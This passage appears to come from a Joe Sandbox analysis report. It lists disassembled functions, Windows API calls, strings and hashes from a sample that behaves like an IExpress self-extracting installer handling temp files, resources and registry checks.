                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2544038247.0000000000DFC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_df0000_Tii6ue74NB.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: DirectoryFile$Create$AttributesDeleteNameRemoveTemp_vsnprintf
                                                                                                                                                                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$IXP$IXP%03d.TMP
                                                                                                                                                                                                                                                            • API String ID: 1082909758-775753704
                                                                                                                                                                                                                                                            • Opcode ID: 4fa9a848fa7813feae950b2cc1ada3ea14a650e8d8a0ff4b0bb14309d26fa41a
                                                                                                                                                                                                                                                            • Instruction ID: da1afda1a04655c24453d72e33c73f4fc5c77176c1c523cefdbbf42326d3cb59
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4fa9a848fa7813feae950b2cc1ada3ea14a650e8d8a0ff4b0bb14309d26fa41a
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0511C8B170060877D7109B3AAC49FBF765DDFC5711F02C115B74AD2294CE748986C6B6
                                                                                                                                                                                                                                                            Function 00DF468F Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 50COMMON
                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                            control_flow_graph 582 df468f-df46b4 FindResourceA SizeofResource 583 df46fb-df46ff 582->583 584 df46b6-df46b8 582->584 584->583 585 df46ba-df46bc 584->585 586 df46be-df46dd FindResourceA LoadResource LockResource 585->586 587 df46f9 585->587 586->587 588 df46df-df46f7 memcpy_s FreeResource 586->588 587->583 588->583
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00DF46A0
                                                                                                                                                                                                                                                            • SizeofResource.KERNEL32(00000000,00000000,?,00DF2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00DF46A9
                                                                                                                                                                                                                                                            • FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00DF46C3
                                                                                                                                                                                                                                                            • LoadResource.KERNEL32(00000000,00000000,?,00DF2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00DF46CC
                                                                                                                                                                                                                                                            • LockResource.KERNEL32(00000000,?,00DF2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00DF46D3
                                                                                                                                                                                                                                                            • memcpy_s.MSVCRT ref: 00DF46E5
                                                                                                                                                                                                                                                            • FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00DF46EF
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2543895110.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2543830281.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2543969218.0000000000DF8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2544038247.0000000000DFA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2544038247.0000000000DFC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_df0000_Tii6ue74NB.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Resource$Find$FreeLoadLockSizeofmemcpy_s
                                                                                                                                                                                                                                                            • String ID: TITLE$valid
                                                                                                                                                                                                                                                            • API String ID: 3370778649-1357392868
                                                                                                                                                                                                                                                            • Opcode ID: 4450edacb01cdb60c47a7e7d56b07ee75750277aa0e4f35d1a75a0601c215be2
                                                                                                                                                                                                                                                            • Instruction ID: 0f769f173b2d99be7d56a9c9a16bcec4774b162204deb10a5b67cca582895be8
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4450edacb01cdb60c47a7e7d56b07ee75750277aa0e4f35d1a75a0601c215be2
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5901D6722403447BE31017A96C4CF7B3E2CDBCAB61F0A8014FB4DC6280DD619C40C2B6
                                                                                                                                                                                                                                                            Function 00DF256D Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 75registryCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                            control_flow_graph 630 df256d-df257d 631 df2583-df2589 630->631 632 df2622-df2627 call df24e0 630->632 634 df258b 631->634 635 df25e8-df2607 RegOpenKeyExA 631->635 637 df2629-df262f 632->637 634->637 638 df2591-df2595 634->638 639 df2609-df2620 RegQueryInfoKeyA 635->639 640 df25e3-df25e6 635->640 638->637 641 df259b-df25ba RegOpenKeyExA 638->641 642 df25d1-df25dd RegCloseKey 639->642 640->637 641->640 643 df25bc-df25cb RegQueryValueExA 641->643 642->640 643->642
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Control\Session Manager,00000000,00020019,?,00000000,?,?,?,00DF1ED3,00000001,00000000,?,?,00DF4137,?), ref: 00DF25B2
                                                                                                                                                                                                                                                            • RegQueryValueExA.KERNELBASE(?,PendingFileRenameOperations,00000000,00000000,00000000,?,?,00DF1ED3,00000001,00000000,?,?,00DF4137,?,00DF4096), ref: 00DF25CB
                                                                                                                                                                                                                                                            • RegCloseKey.KERNELBASE(?,?,00DF1ED3,00000001,00000000,?,?,00DF4137,?,00DF4096), ref: 00DF25DD
                                                                                                                                                                                                                                                            • RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Session Manager\FileRenameOperations,00000000,00020019,?,00000000,?,?,?,00DF1ED3,00000001,00000000,?,?,00DF4137,?), ref: 00DF25FF
                                                                                                                                                                                                                                                            • RegQueryInfoKeyA.ADVAPI32(?,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,00DF1ED3,00000001,00000000), ref: 00DF261A
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            • PendingFileRenameOperations, xrefs: 00DF25C3
                                                                                                                                                                                                                                                            • System\CurrentControlSet\Control\Session Manager, xrefs: 00DF25A8
                                                                                                                                                                                                                                                            • System\CurrentControlSet\Control\Session Manager\FileRenameOperations, xrefs: 00DF25F5
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2543895110.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2543830281.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2543969218.0000000000DF8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2544038247.0000000000DFA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2544038247.0000000000DFC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_df0000_Tii6ue74NB.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: OpenQuery$CloseInfoValue
                                                                                                                                                                                                                                                            • String ID: PendingFileRenameOperations$System\CurrentControlSet\Control\Session Manager$System\CurrentControlSet\Control\Session Manager\FileRenameOperations
                                                                                                                                                                                                                                                            • API String ID: 2209512893-559176071
                                                                                                                                                                                                                                                            • Opcode ID: 938a04e01032db201aea3ee3c281a952a2f045eaa69ea5bbff852ed6b6e3634e
                                                                                                                                                                                                                                                            • Instruction ID: 688913bb23a890df7535a9365d16644b6de402caf198a72d03505c324e837773
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 938a04e01032db201aea3ee3c281a952a2f045eaa69ea5bbff852ed6b6e3634e
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 49118F7590222CBB9F20DB959C09DFBBE7CEF017A1F55C055BA08E2140DA309E48E6B1
                                                                                                                                                                                                                                                            Function 00DF6A60 Relevance: 13.6, APIs: 9, Instructions: 138sleepCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                            control_flow_graph 644 df6a60-df6a91 call df7155 call df7208 GetStartupInfoW 650 df6a93-df6aa2 644->650 651 df6abc-df6abe 650->651 652 df6aa4-df6aa6 650->652 655 df6abf-df6ac5 651->655 653 df6aaf-df6aba Sleep 652->653 654 df6aa8-df6aad 652->654 653->650 654->655 656 df6ac7-df6acf _amsg_exit 655->656 657 df6ad1-df6ad7 655->657 658 df6b0b-df6b11 656->658 659 df6ad9-df6af2 call df6c3f 657->659 660 df6b05 657->660 662 df6b2e-df6b30 658->662 663 df6b13-df6b24 _initterm 658->663 659->658 669 df6af4-df6b00 659->669 660->658 665 df6b3b-df6b42 662->665 666 df6b32-df6b39 662->666 663->662 667 df6b67-df6b71 665->667 668 df6b44-df6b51 call df7060 665->668 666->665 671 df6b74-df6b79 667->671 668->667 678 df6b53-df6b65 668->678 672 df6c39-df6c3e call df724d 669->672 674 df6b7b-df6b7d 671->674 675 df6bc5-df6bc8 671->675 681 df6b7f-df6b81 674->681 682 df6b94-df6b98 674->682 679 df6bca-df6bd3 675->679 680 df6bd6-df6be3 _ismbblead 675->680 678->667 679->680 685 df6be9-df6bed 680->685 686 df6be5-df6be6 680->686 681->675 687 df6b83-df6b85 681->687 683 df6b9a-df6b9e 682->683 684 df6ba0-df6ba2 682->684 688 df6ba3-df6bbc call df2bfb 683->688 684->688 685->671 686->685 687->682 690 df6b87-df6b8a 687->690 694 df6c1e-df6c25 688->694 695 df6bbe-df6bbf exit 688->695 690->682 692 df6b8c-df6b92 690->692 692->687 696 df6c27-df6c2d _cexit 694->696 697 df6c32 694->697 695->675 696->697 697->672
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                              • Part of subcall function 00DF7155: GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 00DF7182
                                                                                                                                                                                                                                                              • Part of subcall function 00DF7155: GetCurrentProcessId.KERNEL32 ref: 00DF7191
                                                                                                                                                                                                                                                              • Part of subcall function 00DF7155: GetCurrentThreadId.KERNEL32 ref: 00DF719A
                                                                                                                                                                                                                                                              • Part of subcall function 00DF7155: GetTickCount.KERNEL32 ref: 00DF71A3
                                                                                                                                                                                                                                                              • Part of subcall function 00DF7155: QueryPerformanceCounter.KERNEL32(?), ref: 00DF71B8
                                                                                                                                                                                                                                                            • GetStartupInfoW.KERNEL32(?,00DF72B8,00000058), ref: 00DF6A7F
                                                                                                                                                                                                                                                            • Sleep.KERNEL32(000003E8), ref: 00DF6AB4
                                                                                                                                                                                                                                                            • _amsg_exit.MSVCRT ref: 00DF6AC9
                                                                                                                                                                                                                                                            • _initterm.MSVCRT ref: 00DF6B1D
                                                                                                                                                                                                                                                            • __IsNonwritableInCurrentImage.LIBCMT ref: 00DF6B49
                                                                                                                                                                                                                                                            • exit.KERNELBASE ref: 00DF6BBF
                                                                                                                                                                                                                                                            • _ismbblead.MSVCRT ref: 00DF6BDA
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2543895110.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2543830281.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2543969218.0000000000DF8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2544038247.0000000000DFA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2544038247.0000000000DFC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_df0000_Tii6ue74NB.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Current$Time$CountCounterFileImageInfoNonwritablePerformanceProcessQuerySleepStartupSystemThreadTick_amsg_exit_initterm_ismbbleadexit
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 836923961-0
                                                                                                                                                                                                                                                            • Opcode ID: 14d1b73247018637a11263b7738b114b722062cbdebdd559a71e82d44a49f056
                                                                                                                                                                                                                                                            • Instruction ID: 02fd68d9a4d8681f726b20d9fa293e24f0ec8285fcd14bef3d9b27b8caa65c95
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 14d1b73247018637a11263b7738b114b722062cbdebdd559a71e82d44a49f056
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0B41C27090436D9FDB219B68E80577977A0EB44750F1AC11AEB85D7790CF70C841DBB1
                                                                                                                                                                                                                                                            Function 00DF58C8 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 74memoryfileCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                            control_flow_graph 698 df58c8-df58d5 699 df58d8-df58dd 698->699 699->699 700 df58df-df58f1 LocalAlloc 699->700 701 df5919-df5959 call df1680 call df658a CreateFileA LocalFree 700->701 702 df58f3-df5901 call df44b9 700->702 705 df5906-df5910 call df6285 701->705 711 df595b-df596c CloseHandle GetFileAttributesA 701->711 702->705 712 df5912-df5918 705->712 711->705 713 df596e-df5970 711->713 713->705 714 df5972-df597b 713->714 714->712
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • LocalAlloc.KERNEL32(00000040,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00DF5534,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00DF58E7
                                                                                                                                                                                                                                                            • CreateFileA.KERNELBASE(00000000,40000000,00000000,00000000,00000001,04000080,00000000,TMP4351$.TMP,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00DF5534,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00DF5943
                                                                                                                                                                                                                                                            • LocalFree.KERNEL32(00000000,?,00DF5534,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00DF594D
                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,00DF5534,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00DF595C
                                                                                                                                                                                                                                                            • GetFileAttributesA.KERNELBASE(C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00DF5534,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00DF5963
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2543895110.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2543830281.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2543969218.0000000000DF8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2544038247.0000000000DFA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2544038247.0000000000DFC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_df0000_Tii6ue74NB.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: FileLocal$AllocAttributesCloseCreateFreeHandle
                                                                                                                                                                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$TMP4351$.TMP
                                                                                                                                                                                                                                                            • API String ID: 747627703-1664176527
                                                                                                                                                                                                                                                            • Opcode ID: 2e85b1934e0b65472b5577641b9158d7c5c38af43ac3a3b700f44450295f8ed9
                                                                                                                                                                                                                                                            • Instruction ID: f8637ad9a573ef8f6b20697eeb97a9ea29649a305b0af20472d93f4ef267d44d
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2e85b1934e0b65472b5577641b9158d7c5c38af43ac3a3b700f44450295f8ed9
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D111D371600318AAC7245B79AC4DBBB7A99DF86360B16C615B719D2295CAB09805C6B0
                                                                                                                                                                                                                                                            Function 00DF51E5 Relevance: 10.6, APIs: 5, Strings: 2, Instructions: 74memoryCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                              • Part of subcall function 00DF468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00DF46A0
                                                                                                                                                                                                                                                              • Part of subcall function 00DF468F: SizeofResource.KERNEL32(00000000,00000000,?,00DF2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00DF46A9
                                                                                                                                                                                                                                                              • Part of subcall function 00DF468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00DF46C3
                                                                                                                                                                                                                                                              • Part of subcall function 00DF468F: LoadResource.KERNEL32(00000000,00000000,?,00DF2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00DF46CC
                                                                                                                                                                                                                                                              • Part of subcall function 00DF468F: LockResource.KERNEL32(00000000,?,00DF2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00DF46D3
                                                                                                                                                                                                                                                              • Part of subcall function 00DF468F: memcpy_s.MSVCRT ref: 00DF46E5
                                                                                                                                                                                                                                                              • Part of subcall function 00DF468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00DF46EF
                                                                                                                                                                                                                                                            • LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,00DF2F4D,?,00000002,00000000), ref: 00DF5201
                                                                                                                                                                                                                                                            • LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000,00000000), ref: 00DF5250
                                                                                                                                                                                                                                                              • Part of subcall function 00DF44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00DF4518
                                                                                                                                                                                                                                                              • Part of subcall function 00DF44B9: MessageBoxA.USER32(?,?,valid,00010010), ref: 00DF4554
                                                                                                                                                                                                                                                              • Part of subcall function 00DF6285: GetLastError.KERNEL32(00DF5BBC), ref: 00DF6285
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2543895110.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2543830281.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2543969218.0000000000DF8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2544038247.0000000000DFA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2544038247.0000000000DFC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_df0000_Tii6ue74NB.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Resource$FindFreeLoadLocal$AllocErrorLastLockMessageSizeofStringmemcpy_s
                                                                                                                                                                                                                                                            • String ID: <None>$UPROMPT
                                                                                                                                                                                                                                                            • API String ID: 957408736-2980973527
                                                                                                                                                                                                                                                            • Opcode ID: b2be64545d7329452245d2278de412842b7dde37199142ff9baabefa13bbd1d7
                                                                                                                                                                                                                                                            • Instruction ID: 2086406a20cff619d6c85d301332e74a98374cc328170f4840c020724b2e1120
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b2be64545d7329452245d2278de412842b7dde37199142ff9baabefa13bbd1d7
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8E11E6B5600309BFE7146B757C45B3B619DDBC9340B12C129BB4AD5294DE798C008138
                                                                                                                                                                                                                                                            Function 00DF3A3F Relevance: 10.6, APIs: 5, Strings: 2, Instructions: 73memorystringCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                              • Part of subcall function 00DF468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00DF46A0
                                                                                                                                                                                                                                                              • Part of subcall function 00DF468F: SizeofResource.KERNEL32(00000000,00000000,?,00DF2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00DF46A9
                                                                                                                                                                                                                                                              • Part of subcall function 00DF468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00DF46C3
                                                                                                                                                                                                                                                              • Part of subcall function 00DF468F: LoadResource.KERNEL32(00000000,00000000,?,00DF2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00DF46CC
                                                                                                                                                                                                                                                              • Part of subcall function 00DF468F: LockResource.KERNEL32(00000000,?,00DF2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00DF46D3
                                                                                                                                                                                                                                                              • Part of subcall function 00DF468F: memcpy_s.MSVCRT ref: 00DF46E5
                                                                                                                                                                                                                                                              • Part of subcall function 00DF468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00DF46EF
                                                                                                                                                                                                                                                            • LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,00DF2F64,?,00000002,00000000), ref: 00DF3A5D
                                                                                                                                                                                                                                                            • LocalFree.KERNEL32(00000000,00000000,00000010,00000000,00000000), ref: 00DF3AB3
                                                                                                                                                                                                                                                              • Part of subcall function 00DF44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00DF4518
                                                                                                                                                                                                                                                              • Part of subcall function 00DF44B9: MessageBoxA.USER32(?,?,valid,00010010), ref: 00DF4554
                                                                                                                                                                                                                                                              • Part of subcall function 00DF6285: GetLastError.KERNEL32(00DF5BBC), ref: 00DF6285
                                                                                                                                                                                                                                                            • lstrcmpA.KERNEL32(<None>,00000000), ref: 00DF3AD0
                                                                                                                                                                                                                                                            • LocalFree.KERNEL32 ref: 00DF3B13
                                                                                                                                                                                                                                                              • Part of subcall function 00DF6517: FindResourceA.KERNEL32(00DF0000,000007D6,00000005), ref: 00DF652A
                                                                                                                                                                                                                                                              • Part of subcall function 00DF6517: LoadResource.KERNEL32(00DF0000,00000000,?,?,00DF2EE8,00000000,00DF19E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 00DF6538
                                                                                                                                                                                                                                                              • Part of subcall function 00DF6517: DialogBoxIndirectParamA.USER32(00DF0000,00000000,00000547,00DF19E0,00000000), ref: 00DF6557
                                                                                                                                                                                                                                                              • Part of subcall function 00DF6517: FreeResource.KERNEL32(00000000,?,?,00DF2EE8,00000000,00DF19E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 00DF6560
                                                                                                                                                                                                                                                            • LocalFree.KERNEL32(00000000,00DF3100,00000000,00000000), ref: 00DF3AF4
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2543895110.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2543830281.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2543969218.0000000000DF8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2544038247.0000000000DFA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2544038247.0000000000DFC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_df0000_Tii6ue74NB.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Resource$Free$Local$FindLoad$AllocDialogErrorIndirectLastLockMessageParamSizeofStringlstrcmpmemcpy_s
                                                                                                                                                                                                                                                            • String ID: <None>$LICENSE
                                                                                                                                                                                                                                                            • API String ID: 2414642746-383193767
                                                                                                                                                                                                                                                            • Opcode ID: f4071e6769b97a708d4a5b72f2613db04fc435f8aad1faa1823162362b39e94a
                                                                                                                                                                                                                                                            • Instruction ID: 47bf039312479c8cdf63f57a60dcdfb76a18e34d21ca73aef953e8a08a952989
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f4071e6769b97a708d4a5b72f2613db04fc435f8aad1faa1823162362b39e94a
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E611A570600309AFD720AB36AC19E377AA9DFD5740B13C02EBB45D63A1DE75C900D635
                                                                                                                                                                                                                                                            Function 00DF52B6 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 65fileCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • SetFileAttributesA.KERNELBASE(00954D58,00000080,?,00000000), ref: 00DF52F2
                                                                                                                                                                                                                                                            • DeleteFileA.KERNELBASE(00954D58), ref: 00DF52FA
                                                                                                                                                                                                                                                            • LocalFree.KERNEL32(00954D58,?,00000000), ref: 00DF5305
                                                                                                                                                                                                                                                            • LocalFree.KERNEL32(00954D58), ref: 00DF530C
                                                                                                                                                                                                                                                            • SetCurrentDirectoryA.KERNELBASE(00DF11FC,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\), ref: 00DF5363
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            • C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 00DF5334
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2543895110.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2543830281.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2543969218.0000000000DF8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2544038247.0000000000DFA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2544038247.0000000000DFC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_df0000_Tii6ue74NB.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: FileFreeLocal$AttributesCurrentDeleteDirectory
                                                                                                                                                                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\
                                                                                                                                                                                                                                                            • API String ID: 2833751637-305352358
                                                                                                                                                                                                                                                            • Opcode ID: 066b9090a8980bd705406bf62f33a75ef92440232fc77a73a65cafea8cc01aa8
                                                                                                                                                                                                                                                            • Instruction ID: 18fde6eb7c0805191c0fc7a60892e9856a5854d7b82839aca379f555e979b4ec
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 066b9090a8980bd705406bf62f33a75ef92440232fc77a73a65cafea8cc01aa8
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F621BE31900709DBCB20AB18FC19B79B7A0EB00354F0AC159EB46D67A8CFB09C84CB71
